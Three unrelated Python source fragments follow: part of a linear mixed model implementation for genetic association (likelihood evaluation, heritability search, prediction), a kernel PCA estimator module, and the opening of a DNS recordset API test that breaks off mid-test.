nGridH2 : number of h2-grid points to evaluate the negative log-likelihood at
minH2 : minimum value for h2 optimization
maxH2 : maximum value for h2 optimization
--------------------------------------------------------------------------
Output:
dictionary containing the model parameters at the optimal h2 and a2
--------------------------------------------------------------------------
'''
self.numcalls=0
resmin=[None]
def f(x,resmin=resmin, nGridH2=nGridH2, minH2=minH2, maxH2=maxH2,**kwargs):
self.numcalls+=1
t0=time.time()
res = self.innerLoopTwoKernel(a2=x, nGridH2=nGridH2, minH2=minH2, maxH2=maxH2,**kwargs)
if (resmin[0] is None) or (res['nLL']<resmin[0]['nLL']):
resmin[0]=res
t1=time.time()
logging.info("x={0}. one objective function call took {1} seconds elapsed ".format(x,t1-t0))
#import pdb; pdb.set_trace()
return res['nLL']
if verbose: logging.info("finda2")
min = minimize1D(f=f, nGrid=nGridA2, minval=minA2, maxval=maxA2,verbose=False)
#print "numcalls to innerLoopTwoKernel= " + str(self.numcalls)
return resmin[0]
def findH2(self, nGridH2=10, minH2 = 0.0, maxH2 = 0.99999, **kwargs):
'''
Find the optimal h2 for a given K. Note that this is the single kernel case. So there is no a2.
(default maxH2 value is set to a value smaller than 1 to avoid loss of positive definiteness of the final model covariance)
--------------------------------------------------------------------------
Input:
nGridH2 : number of h2-grid points to evaluate the negative log-likelihood at
minH2 : minimum value for h2 optimization
maxH2 : maximum value for h2 optimization
--------------------------------------------------------------------------
Output:
dictionary containing the model parameters at the optimal h2
--------------------------------------------------------------------------
'''
#f = lambda x : (self.nLLeval(h2=x,**kwargs)['nLL'])
resmin=[None]
def f(x,resmin=resmin,**kwargs):
res = self.nLLeval(h2=x,**kwargs)
if (resmin[0] is None) or (res['nLL']<resmin[0]['nLL']):
resmin[0]=res
logging.debug("search\t{0}\t{1}".format(x,res['nLL']))
return res['nLL']
min = minimize1D(f=f, nGrid=nGridH2, minval=minH2, maxval=maxH2 )
return resmin[0]
def find_log_delta(self, sid_count, min_log_delta=-5, max_log_delta=10, nGrid=10, **kwargs):
'''
#Need comments
'''
#f = lambda x : (self.nLLeval(h2=x,**kwargs)['nLL'])
resmin=[None]
def f(x,resmin=resmin,**kwargs):
h2 = 1.0/(np.exp(x)*sid_count+1) #We convert from external log_delta to h2 and then back again so that this code is most similar to findH2
res = self.nLLeval(h2=h2,**kwargs)
if (resmin[0] is None) or (res['nLL']<resmin[0]['nLL']):
resmin[0]=res
#logging.info("search\t{0}\t{1}".format(x,res['nLL']))
return res['nLL']
min = minimize1D(f=f, nGrid=nGrid, minval=min_log_delta, maxval=max_log_delta )
res = resmin[0]
internal_delta = 1.0/res['h2']-1.0
ln_external_delta = np.log(internal_delta / sid_count)
res['log_delta'] = ln_external_delta
return res
def nLLeval(self,h2=0.0,REML=True, logdelta = None, delta = None, dof = None, scale = 1.0,penalty=0.0):
'''
evaluate -ln( N( U^T*y | U^T*X*beta , h2*S + (1-h2)*I ) ),
where ((1-a2)*K0 + a2*K1) = USU^T
--------------------------------------------------------------------------
Input:
h2 : mixture weight between K and Identity (environmental noise)
REML : boolean
if True : compute REML
if False : compute ML
dof : Degrees of freedom of the Multivariate student-t
(default None uses multivariate Normal likelihood)
logdelta: log(delta) allows to optionally parameterize in delta space
delta : delta allows to optionally parameterize in delta space
scale : Scale parameter the multiplies the Covariance matrix (default 1.0)
--------------------------------------------------------------------------
Output dictionary:
'nLL' : negative log-likelihood
'sigma2' : the model variance sigma^2
'beta' : [D*1] array of fixed effects weights beta
'h2' : mixture weight between Covariance and noise
'REML' : True: REML was computed, False: ML was computed
'a2' : mixture weight between K0 and K1
'dof' : Degrees of freedom of the Multivariate student-t
(default None uses multivariate Normal likelihood)
'scale' : Scale parameter that multiplies the Covariance matrix (default 1.0)
--------------------------------------------------------------------------
'''
if (h2<0.0) or (h2>1.0):
return {'nLL':3E20,
'h2':h2,
'REML':REML,
'scale':scale}
k=self.S.shape[0]
N=self.y.shape[0]
D=self.UX.shape[1]
#if REML == True:
# # this needs to be fixed, please see test_gwas.py for details
# raise NotImplementedError("this feature is not ready to use at this time, please use lmm_cov.py instead")
if logdelta is not None:
delta = SP.exp(logdelta)
if delta is not None:
Sd = (self.S+delta)*scale
else:
Sd = (h2*self.S + (1.0-h2))*scale
UXS = self.UX / NP.lib.stride_tricks.as_strided(Sd, (Sd.size,self.UX.shape[1]), (Sd.itemsize,0))
UyS = self.Uy / Sd
XKX = UXS.T.dot(self.UX)
XKy = UXS.T.dot(self.Uy)
yKy = UyS.T.dot(self.Uy)
logdetK = SP.log(Sd).sum()
if (k<N):#low rank part
# determine normalization factor
if delta is not None:
denom = (delta*scale)
else:
denom = ((1.0-h2)*scale)
XKX += self.UUX.T.dot(self.UUX)/(denom)
XKy += self.UUX.T.dot(self.UUy)/(denom)
yKy += self.UUy.T.dot(self.UUy)/(denom)
logdetK+=(N-k) * SP.log(denom)
# proximal contamination (see Supplement Note 2: An Efficient Algorithm for Avoiding Proximal Contamination)
# available at: http://www.nature.com/nmeth/journal/v9/n6/extref/nmeth.2037-S1.pdf
# exclude SNPs from the RRM in the likelihood evaluation
if len(self.exclude_idx) > 0:
num_exclude = len(self.exclude_idx)
# consider only excluded SNPs
G_exclude = self.G[:,self.exclude_idx]
self.UW = self.U.T.dot(G_exclude) # needed for proximal contamination
UWS = self.UW / NP.lib.stride_tricks.as_strided(Sd, (Sd.size,num_exclude), (Sd.itemsize,0))
assert UWS.shape == (k, num_exclude)
WW = NP.eye(num_exclude) - UWS.T.dot(self.UW)
WX = UWS.T.dot(self.UX)
Wy = UWS.T.dot(self.Uy)
assert WW.shape == (num_exclude, num_exclude)
assert WX.shape == (num_exclude, D)
assert Wy.shape == (num_exclude,)
if (k<N):#low rank part
self.UUW = G_exclude - self.U.dot(self.UW)
WW += self.UUW.T.dot(self.UUW)/denom
WX += self.UUW.T.dot(self.UUX)/denom
Wy += self.UUW.T.dot(self.UUy)/denom
#TODO: do cholesky, if fails do eigh
# compute inverse efficiently
[S_WW,U_WW] = LA.eigh(WW)
UWX = U_WW.T.dot(WX)
UWy = U_WW.T.dot(Wy)
assert UWX.shape == (num_exclude, D)
assert UWy.shape == (num_exclude,)
# compute S_WW^{-1} * UWX
WX = UWX / NP.lib.stride_tricks.as_strided(S_WW, (S_WW.size,UWX.shape[1]), (S_WW.itemsize,0))
# compute S_WW^{-1} * UWy
Wy = UWy / S_WW
# determinant update
logdetK += SP.log(S_WW).sum()
assert WX.shape == (num_exclude, D)
assert Wy.shape == (num_exclude,)
# perform updates (instantiations for a and b in Equation (1.5) of Supplement)
yKy += UWy.T.dot(Wy)
XKy += UWX.T.dot(Wy)
XKX += UWX.T.dot(WX)
#######
[SxKx,UxKx]= LA.eigh(XKX)
#optionally regularize the beta weights by penalty
if penalty>0.0:
SxKx+=penalty
i_pos = SxKx>1E-10
beta = SP.dot(UxKx[:,i_pos],(SP.dot(UxKx[:,i_pos].T,XKy)/SxKx[i_pos]))
r2 = yKy-XKy.dot(beta)
if dof is None:#Use the Multivariate Gaussian
if REML:
XX = self.X.T.dot(self.X)
[Sxx,Uxx]= LA.eigh(XX)
logdetXX = SP.log(Sxx).sum()
logdetXKX = SP.log(SxKx).sum()
sigma2 = r2 / (N - D)
nLL = 0.5 * ( logdetK + logdetXKX - logdetXX + (N-D) * ( SP.log(2.0*SP.pi*sigma2) + 1 ) )
else:
sigma2 = r2 / (N)
nLL = 0.5 * ( logdetK + N * ( SP.log(2.0*SP.pi*sigma2) + 1 ) )
result = {
'nLL':nLL,
'sigma2':sigma2,
'beta':beta,
'h2':h2,
'REML':REML,
'a2':self.a2,
'scale':scale
}
else:#Use multivariate student-t
if REML:
XX = self.X.T.dot(self.X)
[Sxx,Uxx]= LA.eigh(XX)
logdetXX = SP.log(Sxx).sum()
logdetXKX = SP.log(SxKx).sum()
nLL = 0.5 * ( logdetK + logdetXKX - logdetXX + (dof + (N-D)) * SP.log(1.0+r2/dof) )
nLL += 0.5 * (N-D)*SP.log( dof*SP.pi ) + SS.gammaln( 0.5*dof ) - SS.gammaln( 0.5* (dof + (N-D) ))
else:
nLL = 0.5 * ( logdetK + (dof + N) * SP.log(1.0+r2/dof) )
nLL += 0.5 * N*SP.log( dof*SP.pi ) + SS.gammaln( 0.5*dof ) - SS.gammaln( 0.5* (dof + N ))
result = {
'nLL':nLL,
'dof':dof,
'beta':beta,
'h2':h2,
'REML':REML,
'a2':self.a2,
'scale':scale
}
assert SP.all(SP.isreal(nLL)), "nLL has an imaginary component, possibly due to constant covariates"
return result
def getPosteriorWeights(self,beta,h2=0.0,logdelta=None,delta=None,scale=1.0):
'''
compute posterior mean over the feature weights (effect sizes of SNPs in the kernel, not the SNPs being tested):
w = G.T (GG.T + delta*I)^(-1) (y - Xbeta)
--------------------------------------------------------------------------
Input:
beta : weight vector for fixed effects
h2 : mixture weight between K and Identity (environmental noise)
logdelta : log(delta) allows to optionally parameterize in delta space
delta : delta allows to optionally parameterize in delta space
scale : Scale parameter the multiplies the Covariance matrix (default 1.0)
returnVar : if True, marginal variances are estimated
returnCovar : if True, posterior covariance is learnt
--------------------------------------------------------------------------
Dictionary with the following fields:
weights : [k0+k1] 1-dimensional array of predicted phenotype values
--------------------------------------------------------------------------
'''
k=self.S.shape[0]
N=self.y.shape[0]
if logdelta is not None:
delta = SP.exp(logdelta)
if delta is not None:
Sd = (self.S+delta)*scale
else:
Sd = (h2*self.S + (1.0-h2))*scale
yres = self.y - SP.dot(self.X,beta)
Uyres = SP.dot(self.U.T,yres)
UG = SP.dot(self.U.T, self.G)
weights = SP.dot(UG.T , Uyres/Sd)
if k < N: # low-rank part
# determine normalization factor
if delta is not None:
denom = (delta*scale)
else:
denom = ((1.0-h2)*scale)
UUG = self.G - SP.dot(self.U, UG)
UUyres = yres - SP.dot(self.U,Uyres)
weights += UUG.T.dot(UUyres)/(denom)
return weights
def setTestData(self,Xstar,K0star=None,K1star=None,G0star=None,G1star=None):
'''
set data for predicting
--------------------------------------------------------------------------
Input:
Xstar : [M,D] 2-dimensional array of covariates on the test set
G0star : [M,k0] array of random effects on the test set
G1star : [M,k1] array of random effects on the test set (optional)
K0star : [M,N] array, random effects covariance between test and training data (positive semi-definite)
K1star : [M,N] array, random effects covariance between test and training data (positive semi-definite)(optional)
where M is # of test cases, N is the # of training cases
--------------------------------------------------------------------------
'''
self.Xstar = Xstar
if G1star is None:
self.Gstar=G0star
else:
if self.a2 == 0.0:
logging.info("a2=0.0, only using G0")
self.Gstar = G0star
elif self.a2 == 1.0:
self.Gstar = G1star
logging.info("a2=1.0, only using G1")
else:
self.Gstar=SP.concatenate((SP.sqrt(1.0-self.a2) * G0star, SP.sqrt(self.a2) * G1star),1)
if K0star is not None:
if K1star is None:
self.Kstar = K0star
else:
self.Kstar = (1.0-self.a2)*K0star + self.a2*K1star
else:
self.Kstar = SP.dot(self.Gstar,self.G.T)
self.UKstar = SP.dot(self.U.T,self.Kstar.T)
if self.G is not None:
k = self.G.shape[1]
N = self.G.shape[0]
if k<N:
# see e.g. Equation 3.17 in Supplement of FaST LMM paper
self.UUKstar = self.Kstar.T - SP.dot(self.U, self.UKstar)
def setTestData2(self,Xstar,K0star=None,K1star=None):
'''
a version of setTestData that doesn't assume that Eigenvalue decomposition has been done.
'''
self.Xstar = Xstar
self.Gstar = None
if K1star is None:
self.Kstar = K0star
else:
self.Kstar = (1.0-self.a2)*K0star + self.a2*K1star
def predictMean(self, beta, h2=0.0, logdelta=None, delta=None, scale=1.0):
'''
mean prediction for the linear mixed model on unobserved data:
ystar = X*beta + Kstar(h2*K + (1-h2)*K)^{-1}(y-X*beta)
where Kstar is the train vs test kernel
--------------------------------------------------------------------------
Input:
beta : weight vector for fixed effects
h2 : mixture weight between K and Identity (environmental noise)
logdelta : log(delta) allows to optionally parameterize in delta space
delta : delta allows to optionally parameterize in delta space
scale : Scale parameter the multiplies the Covariance matrix (default 1.0)
If SNPs are excluded, nLLeval must be called before to re-calculate self.UW,self.UUW
--------------------------------------------------------------------------
Output:
ystar : [M] 1-dimensional array of predicted phenotype values
--------------------------------------------------------------------------
'''
M = self.Xstar.shape[0]
if (h2<0.0) or (h2>=1.0):
return SP.nan * SP.ones(M)
k=self.S.shape[0]
N=self.y.shape[0]
#D=self.UX.shape[1]
if logdelta is not None:
delta = SP.exp(logdelta)
#delta = (1-h2) / h2
if delta is not None:
Sd = (self.S+delta)*scale
else:
assert False, "not implemented (UKstar needs to be scaled by h2)"
Sd = (h2*self.S + (1.0-h2))*scale
if len(self.exclude_idx) > 0:
# cut out
num_exclude = len(self.exclude_idx)
# consider only excluded SNPs
Gstar_exclude = self.Gstar[:,self.exclude_idx]
#G_exclude = self.G[:,self.exclude_idx]
UKstar = self.UKstar - SP.dot(self.UW,Gstar_exclude.T)
if k<N:
UUKstar = self.UUKstar - SP.dot(self.UUW,Gstar_exclude.T)
else:
UKstar = self.UKstar
UUKstar = self.UUKstar
yfixed = SP.dot(self.Xstar,beta)
yres = self.y - SP.dot(self.X,beta)
Uyres = self.Uy - SP.dot(self.UX,beta)
Sdi = 1./Sd
yrandom = SP.dot(Sdi*UKstar.T,Uyres)
if k < N: # low-rank part
# determine normalization factor
if delta is not None:
denom = (delta*scale)
else:
denom = ((1.0-h2)*scale)
UUyres = yres - SP.dot(self.U,Uyres)
yrandom += SP.dot(UUKstar.T,UUyres)/denom
# proximal contamination (see Supplement Note 2: An Efficient Algorithm for Avoiding Proximal Contamination)
# available at: http://www.nature.com/nmeth/journal/v9/n6/extref/nmeth.2037-S1.pdf
# exclude SNPs from the RRM in the likelihood evaluation
if len(self.exclude_idx) > 0:
UWS = self.UW / NP.lib.stride_tricks.as_strided(Sd, (Sd.size,num_exclude), (Sd.itemsize,0))
assert UWS.shape == (k, num_exclude)
WW = NP.eye(num_exclude) - UWS.T.dot(self.UW)
WKstar = UWS.T.dot(UKstar)
Wyres = UWS.T.dot(Uyres)
assert WW.shape == (num_exclude, num_exclude)
assert WKstar.shape == (num_exclude, M)
assert Wyres.shape == (num_exclude,)
if (k<N):#low rank part
WW += self.UUW.T.dot(self.UUW)/denom
WKstar += self.UUW.T.dot(UUKstar)/denom
Wyres += self.UUW.T.dot(UUyres)/denom
#TODO: do cholesky, if fails do eigh
# compute inverse efficiently
[S_WW,U_WW] = LA.eigh(WW)
UWKstar = U_WW.T.dot(WKstar)
UWyres = U_WW.T.dot(Wyres)
assert UWKstar.shape == (num_exclude, M)
assert UWyres.shape == (num_exclude,)
# compute S_WW^{-1} * UWX
WKstar = UWKstar / NP.lib.stride_tricks.as_strided(S_WW, (S_WW.size,UWKstar.shape[1]), (S_WW.itemsize,0))
# compute S_WW^{-1} * UWy
Wyres = UWyres / S_WW
assert WKstar.shape == (num_exclude, M)
assert Wyres.shape == (num_exclude,)
# perform updates (instantiations for a and b in Equation (1.5) of Supplement)
yrandom += UWKstar.T.dot(Wyres)
ystar = yfixed + yrandom
return ystar
def predict_mean_and_variance(lmm, beta, sigma2, h2, Kstar_star):
assert 0 <= h2 and h2 <= 1, "By definition, h2 must be between 0 and 1 (inclusive)"
varg = h2 * sigma2
vare = (1.-h2) * sigma2
if lmm.G is not None:
K = np.dot(lmm.G,lmm.G.T) #!!!later this is very inefficient in memory and computation
else:
K = np.dot(np.dot(lmm.U,np.eye(len(lmm.U)) * lmm.S),lmm.U.T) #Re-compose the Eigen value decomposition #!!!later do this more efficiently
V = varg * K + vare * np.eye(len(K))
Vinv = LA.inv(V)
a = np.dot(varg * lmm.Kstar, Vinv)
y_star = np.dot(lmm.Xstar,beta) + np.dot(a, lmm.y-SP.dot(lmm.X,beta)) #!!!later shouldn't the 2nd dot be precomputed?
y_star = y_star.reshape(-1,1) #Make 2-d
var_star = (varg * Kstar_star +
vare * np.eye(len(Kstar_star)) -
np.dot(a,
(varg * lmm.Kstar.T)))
return y_star, var_star
def nLL(lmm, beta, sigma2, h2, y_actual):
from scipy.stats import multivariate_normal
y_star, var_star = predict_mean_and_variance(lmm, beta, sigma2, h2, lmm.Kstar_star)
var = multivariate_normal(mean=y_star.reshape(-1), cov=var_star)
return -np.log(var.pdf(y_actual.reshape(-1)))
def predictVariance(self, h2=0.0, logdelta = None, delta = None, sigma2 = 1.0, Kstar_star = None):
'''
variance prediction for the linear mixed model on unobserved data:
Var_star = sigma2 * (K(X*,X*) + delta*I - Kstar (K + delta*I)^{-1} Kstar )
--------------------------------------------------------------------------
Input:
h2 : mixture weight between K and Identity (environmental noise)
logdelta : log(delta) allows to optionally parameterize in delta space
delta : delta allows to optionally parameterize in delta space
sigma2 : sigma2 parameter the multiplies the Covariance matrix (default 1.0)
K_star_star : Kernel on test examples
If SNPs are excluded, nLLeval must be called before to re-calculate self.UW,self.UUW
--------------------------------------------------------------------------
Output:
Cov_star : [M,M] 2-dimensional array covariance matrix
--------------------------------------------------------------------------
'''
#TODO: proximal contamination
#TODO: REML?
if (h2<0.0) or (h2>=1.0):
return SP.nan * SP.ones(M)
k = self.S.shape[0]
N = self.y.shape[0]
#D = self.UX.shape[1]
#print "k, N, D", k, N, D
if logdelta is not None:
delta = SP.exp(logdelta)
if delta is not None:
#Sd = (self.S+delta)*sigma2
Sd = (self.S+delta)
else:
#Sd = (h2*self.S + (1.0-h2))*sigma2
Sd = (h2*self.S + (1.0-h2))
assert False, "h2 code path not test. Please use delta or logdelta"
#delta = 1.0/h2-1.0 #right?
Sdi = 1./Sd
# part 1 from c-code
#TODO: handle h2 parameterization
#TODO: make more efficient (add_diag)
if Kstar_star is None:
N_test = self.Gstar.shape[0]
Kstar_star = SP.dot(self.Gstar, self.Gstar.T)
else:
Kstar_star = Kstar_star.copy()
N_test = Kstar_star.shape[0]
assert N_test == Kstar_star.shape[1]
part1 = Kstar_star
part1 += SP.eye(N_test)*delta
part1 *= sigma2
#print "part1", part1[0,0]
#print "delta", delta, "sigma2", sigma2
# part 2 from c-code
# (U1^T a)^T (S_1 + delta*I)^{-1} (U1^T a)
SUKstarTUkStar = SP.dot(Sdi*self.UKstar.T, self.UKstar)
#UXS = self.UKstar / NP.lib.stride_tricks.as_strided(Sd, (Sd.size,self.UKstar.shape[1]), (Sd.itemsize,0))
#NP.testing.assert_array_almost_equal(SUKstarTUkStar, SP.dot(UXS.T, self.UKstar), decimal=4)
SUKstarTUkStar *= sigma2
#print "UKstar[0,0]", self.UKstar[0,0]
#print "UKstarS[0,0]", UXS[0,0]
#print "SUK", SUKstarTUkStar[0,0]
# part 3&4 from c-code
if k < N: # low-rank part
# determine normalization factor
if delta is not None:
denom = (delta*sigma2)
else:
denom = ((1.0-h2)*sigma2)
# see Equation 3.17 in Supplement of FaST LMM paper:
# 1 / delta * (((I_n - U1U1^T)a)^T (I_n - U1U1^T)a), a=K(XS,X)
SUKstarTUkStar += SP.dot(self.UUKstar.T, self.UUKstar)/denom
# see Carl Rasmussen's book on GPs, Equation 2.24
# or Equation 5 in Lasso-LMM paper
Var_star = part1 - SUKstarTUkStar
return Var_star
def nLLeval_test(self, y_test, beta, h2=0.0, logdelta=None, delta=None, sigma2=1.0, Kstar_star=None, robust=False):
"""
compute out-of-sample log-likelihood
robust: boolean
indicates if eigenvalues will be truncated at 1E-9 or 1E-4. The former (default) one was used in FastLMMC,
but may lead to numerically unstable solutions.
"""
assert y_test.ndim == 1, "y_test should have 1 dimension"
mu = self.predictMean(beta, h2=h2, logdelta=logdelta, delta=delta)
res = y_test - mu
sigma = self.predictVariance(h2=h2, logdelta=logdelta, delta=delta, sigma2=sigma2, Kstar_star=Kstar_star)
#TODO: benchmark, record speed difference
"""
# efficient computation of: (y - mu)^T sigma2^{-1} (y - mu)
# Solve the linear system x = (L L^T)^-1 res
try:
L = SP.linalg.cho_factor(sigma)
res_sig = SP.linalg.cho_solve(L, res)
logdetK = NP.linalg.slogdet(sigma)[1]
except Exception, detail:
print "Cholesky failed, using eigen-value decomposition!"
"""
[S_,U_] = LA.eigh(sigma)
if robust:
S_nonz=(S_>1E-4)
else:
S_nonz=(S_>1E-9)
assert sum(S_nonz) > 0, "Some eigenvalues should be nonzero"
S = S_[S_nonz]
U = U_[:, S_nonz]
Sdi = 1 / S
res_sig = res.T.dot(Sdi * U).dot(U.T)
logdetK = SP.log(S).sum()
# some sanity checks
if False:
res_sig3 = SP.linalg.pinv(sigma).dot(res)
NP.testing.assert_array_almost_equal(res_sig, res_sig3, decimal=2)
# see Carl Rasmussen's book on GPs, equation 5.10, or
term1 = -0.5 * logdetK
term2 = -0.5 * SP.dot(res_sig.reshape(-1).T, res.reshape(-1)) #Change the inputs to the functions so that these are vectors, not 1xn,nx1
term3 = -0.5 * len(res) * SP.log(2 * SP.pi)
if term2 < -10000:
logging.warning("looks like nLLeval_test is running into numerical difficulties")
SC = S.copy()
SC.sort()
logging.warning(["delta:", delta, "log det", logdetK, "term 2", term2, "term 3:", term3 ])
logging.warning(["largest eigv:", SC[-1], "second largest eigv:", SC[-2], "smallest eigv:", SC[0] ])
logging.warning(["ratio 1large/2large:", SC[-1]/SC[-2], "ratio lrg/small:", SC[-1]/SC[0] ])
neg_log_likelihood = -(term1 + term2 + term3)
return neg_log_likelihood
| |
"""Kernel Principal Components Analysis"""
# Author: Mathieu Blondel <mathieu@mblondel.org>
# License: BSD 3 clause
import numpy as np
from scipy import linalg
from ..utils import check_random_state
from ..utils.arpack import eigsh
from ..utils.validation import check_is_fitted
from ..exceptions import NotFittedError
from ..base import BaseEstimator, TransformerMixin
from ..preprocessing import KernelCenterer
from ..metrics.pairwise import pairwise_kernels
class KernelPCA(BaseEstimator, TransformerMixin):
"""Kernel Principal component analysis (KPCA)
Non-linear dimensionality reduction through the use of kernels (see
:ref:`metrics`).
Read more in the :ref:`User Guide <kernel_PCA>`.
Parameters
----------
n_components: int or None
Number of components. If None, all non-zero components are kept.
kernel: "linear" | "poly" | "rbf" | "sigmoid" | "cosine" | "precomputed"
Kernel.
Default: "linear"
degree : int, default=3
Degree for poly kernels. Ignored by other kernels.
gamma : float, optional
Kernel coefficient for rbf and poly kernels. Default: 1/n_features.
Ignored by other kernels.
coef0 : float, optional
Independent term in poly and sigmoid kernels.
Ignored by other kernels.
kernel_params : mapping of string to any, optional
Parameters (keyword arguments) and values for kernel passed as
callable object. Ignored by other kernels.
alpha: int
Hyperparameter of the ridge regression that learns the
inverse transform (when fit_inverse_transform=True).
Default: 1.0
fit_inverse_transform: bool
Learn the inverse transform for non-precomputed kernels.
(i.e. learn to find the pre-image of a point)
Default: False
eigen_solver: string ['auto'|'dense'|'arpack']
Select eigensolver to use. If n_components is much less than
the number of training samples, arpack may be more efficient
than the dense eigensolver.
tol: float
convergence tolerance for arpack.
Default: 0 (optimal value will be chosen by arpack)
max_iter : int
maximum number of iterations for arpack
Default: None (optimal value will be chosen by arpack)
remove_zero_eig : boolean, default=False
If True, then all components with zero eigenvalues are removed, so
that the number of components in the output may be < n_components
(and sometimes even zero due to numerical instability).
When n_components is None, this parameter is ignored and components
with zero eigenvalues are removed regardless.
random_state : int seed, RandomState instance, or None, default : None
A pseudo random number generator used for the initialization of the
residuals when eigen_solver == 'arpack'.
n_jobs : int, optional (default = 1)
The number of parallel jobs to run.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Attributes
----------
lambdas_ :
Eigenvalues of the centered kernel matrix
alphas_ :
Eigenvectors of the centered kernel matrix
dual_coef_ :
Inverse transform matrix
X_transformed_fit_ :
Projection of the fitted data on the kernel principal components
References
----------
Kernel PCA was introduced in:
Bernhard Schoelkopf, Alexander J. Smola,
and Klaus-Robert Mueller. 1999. Kernel principal
component analysis. In Advances in kernel methods,
MIT Press, Cambridge, MA, USA 327-352.
"""
def __init__(self, n_components=None, kernel="linear",
gamma=None, degree=3, coef0=1, kernel_params=None,
alpha=1.0, fit_inverse_transform=False, eigen_solver='auto',
tol=0, max_iter=None, remove_zero_eig=False,
random_state=None, n_jobs=1):
if fit_inverse_transform and kernel == 'precomputed':
raise ValueError(
"Cannot fit_inverse_transform with a precomputed kernel.")
self.n_components = n_components
self.kernel = kernel
self.kernel_params = kernel_params
self.gamma = gamma
self.degree = degree
self.coef0 = coef0
self.alpha = alpha
self.fit_inverse_transform = fit_inverse_transform
self.eigen_solver = eigen_solver
self.remove_zero_eig = remove_zero_eig
self.tol = tol
self.max_iter = max_iter
self._centerer = KernelCenterer()
self.random_state = random_state
self.n_jobs = n_jobs
@property
def _pairwise(self):
return self.kernel == "precomputed"
def _get_kernel(self, X, Y=None):
if callable(self.kernel):
params = self.kernel_params or {}
else:
params = {"gamma": self.gamma,
"degree": self.degree,
"coef0": self.coef0}
return pairwise_kernels(X, Y, metric=self.kernel,
filter_params=True, n_jobs=self.n_jobs,
**params)
def _fit_transform(self, K):
""" Fit's using kernel K"""
# center kernel
K = self._centerer.fit_transform(K)
if self.n_components is None:
n_components = K.shape[0]
else:
n_components = min(K.shape[0], self.n_components)
# compute eigenvectors
if self.eigen_solver == 'auto':
if K.shape[0] > 200 and n_components < 10:
eigen_solver = 'arpack'
else:
eigen_solver = 'dense'
else:
eigen_solver = self.eigen_solver
if eigen_solver == 'dense':
self.lambdas_, self.alphas_ = linalg.eigh(
K, eigvals=(K.shape[0] - n_components, K.shape[0] - 1))
elif eigen_solver == 'arpack':
random_state = check_random_state(self.random_state)
# initialize with [-1,1] as in ARPACK
v0 = random_state.uniform(-1, 1, K.shape[0])
self.lambdas_, self.alphas_ = eigsh(K, n_components,
which="LA",
tol=self.tol,
maxiter=self.max_iter,
v0=v0)
# sort eigenvectors in descending order
indices = self.lambdas_.argsort()[::-1]
self.lambdas_ = self.lambdas_[indices]
self.alphas_ = self.alphas_[:, indices]
# remove eigenvectors with a zero eigenvalue
if self.remove_zero_eig or self.n_components is None:
self.alphas_ = self.alphas_[:, self.lambdas_ > 0]
self.lambdas_ = self.lambdas_[self.lambdas_ > 0]
return K
def _fit_inverse_transform(self, X_transformed, X):
if hasattr(X, "tocsr"):
raise NotImplementedError("Inverse transform not implemented for "
"sparse matrices!")
n_samples = X_transformed.shape[0]
K = self._get_kernel(X_transformed)
K.flat[::n_samples + 1] += self.alpha
self.dual_coef_ = linalg.solve(K, X, sym_pos=True, overwrite_a=True)
self.X_transformed_fit_ = X_transformed
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
K = self._get_kernel(X)
self._fit_transform(K)
if self.fit_inverse_transform:
sqrt_lambdas = np.diag(np.sqrt(self.lambdas_))
X_transformed = np.dot(self.alphas_, sqrt_lambdas)
self._fit_inverse_transform(X_transformed, X)
self.X_fit_ = X
return self
def fit_transform(self, X, y=None, **params):
"""Fit the model from data in X and transform X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new: array-like, shape (n_samples, n_components)
"""
self.fit(X, **params)
X_transformed = self.alphas_ * np.sqrt(self.lambdas_)
if self.fit_inverse_transform:
self._fit_inverse_transform(X_transformed, X)
return X_transformed
def transform(self, X):
"""Transform X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Returns
-------
X_new: array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'X_fit_')
K = self._centerer.transform(self._get_kernel(X, self.X_fit_))
return np.dot(K, self.alphas_ / np.sqrt(self.lambdas_))
def inverse_transform(self, X):
"""Transform X back to original space.
Parameters
----------
X: array-like, shape (n_samples, n_components)
Returns
-------
X_new: array-like, shape (n_samples, n_features)
References
----------
"Learning to Find Pre-Images", G BakIr et al, 2004.
"""
if not self.fit_inverse_transform:
raise NotFittedError("The fit_inverse_transform parameter was not"
" set to True when instantiating and hence "
"the inverse transform is not available.")
K = self._get_kernel(X, self.X_transformed_fit_)
return np.dot(K, self.dual_coef_)
| |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from mock import patch
import oslo_messaging as messaging
from oslo_log import log as logging
from designate import exceptions
from designate.central import service as central_service
from designate.tests.test_api.test_v2 import ApiV2TestCase
LOG = logging.getLogger(__name__)
class ApiV2RecordSetsTest(ApiV2TestCase):
def setUp(self):
super(ApiV2RecordSetsTest, self).setUp()
# Create a domain
self.domain = self.create_domain()
def test_create_recordset(self):
# Prepare a RecordSet fixture
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
# Check the headers are what we expect
self.assertEqual(201, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
self.assertIn('records', response.json)
# The action and status are NONE and ACTIVE as there are no records
self.assertEqual('NONE', response.json['action'])
self.assertEqual('ACTIVE', response.json['status'])
def test_create_recordset_with_records(self):
# Prepare a RecordSet fixture
fixture = self.get_recordset_fixture(
self.domain['name'], 'A', fixture=0, values={'records': [
'192.0.2.1',
'192.0.2.2',
]}
)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
# Check the headers are what we expect
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the values returned are what we expect
self.assertIn('records', response.json)
